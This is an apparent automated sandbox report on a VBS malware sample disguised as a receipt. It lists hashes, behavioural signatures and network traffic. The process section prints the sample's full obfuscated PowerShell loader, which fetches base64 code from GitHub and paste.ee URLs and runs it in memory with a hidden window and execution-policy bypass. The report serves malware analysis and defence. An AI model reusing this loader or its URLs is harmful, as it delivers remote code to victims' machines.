Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09/10/2024, 18:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
E_receipt.vbs
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
E_receipt.vbs
Resource
win10v2004-20241007-en
General
-
Target
E_receipt.vbs
-
Size
3KB
-
MD5
1f7229b717e61580e9baf2830ee7afd0
-
SHA1
98ade23ab27475f6d62f97a45b76b247075ff421
-
SHA256
fa4cc3e867b36269dab9161f078565ff9048ac55ea6dccb8a39b5e156009eabf
-
SHA512
ed233c408b5e7f6948756ff6a7585733055de3ccb3b0408aed31b543a5da722f5e0de949cce3fef1dc22be07aa481205efd5aa2c99959195b3c6ed758e7715f3
Malware Config
Extracted
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 2296 WScript.exe 4 2296 WScript.exe 8 2936 powershell.exe 9 2936 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 612 powershell.exe 2936 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 raw.githubusercontent.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 612 powershell.exe 2936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 612 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2296 wrote to memory of 612 2296 WScript.exe 30 PID 2296 wrote to memory of 612 2296 WScript.exe 30 PID 2296 wrote to memory of 612 2296 WScript.exe 30 PID 612 wrote to memory of 2936 612 powershell.exe 32 PID 612 wrote to memory of 2936 612 powershell.exe 32 PID 612 wrote to memory of 2936 612 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E_receipt.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYmNmdXJsJysnID0gTzNoaHR0JysncHM6LycrJy9yYXcuZ2knKyd0aCcrJ3VidXNlcmMnKydvbnRlbnQnKycuJysnY29tL05vJysnRGV0ZWMnKyd0T24vTm9EZXRlY3RPbi9yJysnZWZzL2hlJysnYWQnKydzL21haW4vJysnRGUnKyd0YWhOb3RoJysnLVYudHh0TzNoJysnOyAnKydiY2ZiYXNlNjRDb250JysnZW4nKyd0ID0nKycgKE5lJysndycrJy1PYmplY3QgJysnU3lzdGVtLk5ldC5XZScrJ2InKydDbGllbnQpJysnLkRvJysnd25sbycrJ2FkUycrJ3RyaW4nKydnKGJjZicrJ3VybCk7ICcrJ2InKydjJysnZmJpbmFyeUNvbnQnKydlbnQnKycgPSAnKydbJysnU3lzdGVtLicrJ0MnKydvbnYnKydlcnQnKyddOjpGcm9tQmFzZTY0U3RyaScrJ25nKGJjZmJhc2U2JysnNCcrJ0NvbnRlbnQpOycrJyBiJysnY2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZWZsZWN0aW8nKyduJysnLkFzc2VtJysnYmx5XTo6TG9hZChiJysnY2YnKydiaScrJ25hcnknKydDbycrJ250ZW50KTsnKycgW2RubGknKydiJysnLkknKydPLkhvbWVdJysnOjpWJysnQUkoJysnbHRSdHh0LjNyJysneC9tb2MueWEnKydwZXMnKydtZXRzeScrJ3MvLzpzcHR0aGwnKyd0UicrJywgJysnbHRSMWx0UicrJywnKycgbCcrJ3RSQzo0VlBQJysncm9ncmFtRCcrJ2F0YTRWUGx0UiwgJysnbHQnKydSdicrJ2FnJysnZW1sdFIsJysnIGwnKyd0UlJlZycrJ0FzbWwnKyd0JysnUiwgbHQnKydSJysnbHRSLGx0UmwnKyd0JysnUiknKSAtUkVQbEFjRShbY0hBcl03OStbY0hBcl01MStbY0hBcl0xMDQpLFtjSEFyXTM5ICAtUkVQbEFjRSAnbHRSJyxbY0hBcl0zNCAtUkVQbEFjRSAgKFtjSEFyXTUyK1tjSEFyXTg2K1tjSEFyXTgwKSxbY0hBcl05MiAtUkVQbEFjRSAnYmNmJyxbY0hBcl0zNikgfC4oICRzaEVsTElkWzFdKyRTaEVMTElEWzEzXSsneCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bcfurl'+' = O3hhtt'+'ps:/'+'/raw.gi'+'th'+'ubuserc'+'ontent'+'.'+'com/No'+'Detec'+'tOn/NoDetectOn/r'+'efs/he'+'ad'+'s/main/'+'De'+'tahNoth'+'-V.txtO3h'+'; '+'bcfbase64Cont'+'en'+'t ='+' (Ne'+'w'+'-Object '+'System.Net.We'+'b'+'Client)'+'.Do'+'wnlo'+'adS'+'trin'+'g(bcf'+'url); '+'b'+'c'+'fbinaryCont'+'ent'+' = '+'['+'System.'+'C'+'onv'+'ert'+']::FromBase64Stri'+'ng(bcfbase6'+'4'+'Content);'+' b'+'cfas'+'sem'+'bly '+'= [Reflectio'+'n'+'.Assem'+'bly]::Load(b'+'cf'+'bi'+'nary'+'Co'+'ntent);'+' [dnli'+'b'+'.I'+'O.Home]'+'::V'+'AI('+'ltRtxt.3r'+'x/moc.ya'+'pes'+'metsy'+'s//:sptthl'+'tR'+', '+'ltR1ltR'+','+' l'+'tRC:4VPP'+'rogramD'+'ata4VPltR, '+'lt'+'Rv'+'ag'+'emltR,'+' l'+'tRReg'+'Asml'+'t'+'R, lt'+'R'+'ltR,ltRl'+'t'+'R)') -REPlAcE([cHAr]79+[cHAr]51+[cHAr]104),[cHAr]39 -REPlAcE 'ltR',[cHAr]34 -REPlAcE ([cHAr]52+[cHAr]86+[cHAr]80),[cHAr]92 -REPlAcE 'bcf',[cHAr]36) |.( $shElLId[1]+$ShELLID[13]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
Network
-
Remote address:8.8.8.8:53Requestpaste.eeIN AResponsepaste.eeIN A172.67.187.200paste.eeIN A104.21.84.67
-
Remote address:172.67.187.200:80RequestGET /d/VO2TX HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: paste.ee
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://paste.ee/d/VO2TX
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6%2FSDBW2kXV1RAChWVKeMPUaJMLRHdzPMxeVsBFNrxWqXVbg3GlYO32VzaW2khf9A2%2Fq1bLU4MBD1FJ%2BuwGoMErwXwa%2BGADpSwgUeaWFiwuXV5v4i8Jxkb%2FihQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8d004b0a2a9abebe-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.187.200:443RequestGET /d/VO2TX HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: paste.ee
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgXXsHHfWMrU%2FOGOIlJdCA0M1DL6VOBnxahY5iJ0RLVxa9nkVyKRk5RpMM2kXFWQpNxcr%2BZ0Q1OwOgkrsGSZqxybAIz%2F8BeBZEPt2pHgx5FoMXSXT5fUnW%2F3CA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d004b0ccce39541-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.110.133
-
403 B 1.0kB 5 4
HTTP Request
GET http://paste.ee/d/VO2TXHTTP Response
301 -
5.6kB 265.2kB 112 217
HTTP Request
GET https://paste.ee/d/VO2TXHTTP Response
200 -
359 B 219 B 5 5
-
359 B 219 B 5 5
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5115de104d2e417f732ad8ac27d2f835a
SHA1dd210f9df79ee904e27b513249ba3a2a59ea20ff
SHA2562119799f6fb5608553ad91f0ce7f16a1254233b52b55e2197df8cccbb77b9bda
SHA512adb071e49f5c2410c8bc27382ee85602420aa49e1e4828788dde65bd8eee99171fa7365c81d1ee6056d99802483a7d9c5dce47f22313e3c4f765471e388f636d